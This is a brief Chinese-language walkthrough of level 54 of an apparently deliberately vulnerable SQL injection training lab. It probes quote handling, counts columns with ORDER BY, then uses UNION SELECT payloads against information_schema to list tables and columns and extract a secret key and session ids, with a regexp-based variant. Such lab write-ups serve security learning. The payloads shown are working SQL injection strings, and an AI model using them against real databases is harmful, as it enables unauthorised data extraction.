第五十四关:
这关大概意思就是尝试次数不能多于十次,必须十次之类查询处特点的key。
第一次:输入单引号报错
第二次:输入双引号不报错
说明后台是单引号进行的拼凑
第三步:这里应该是判断列,用order by来判断。
这里已知是三行(手动滑稽)
第四步:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="challenges" --+
第五步:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="ewdzu507qq" --+
第六步:?id=0' union select 1,group_concat(secret_6PNC),group_concat(sessid) from challenges.ewdzu507qq --+
最后:也可以用正则的方法来查询
?id=-1' union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where column_name regexp "^secret_[A-Z]{4}$" limit 0,1 --+
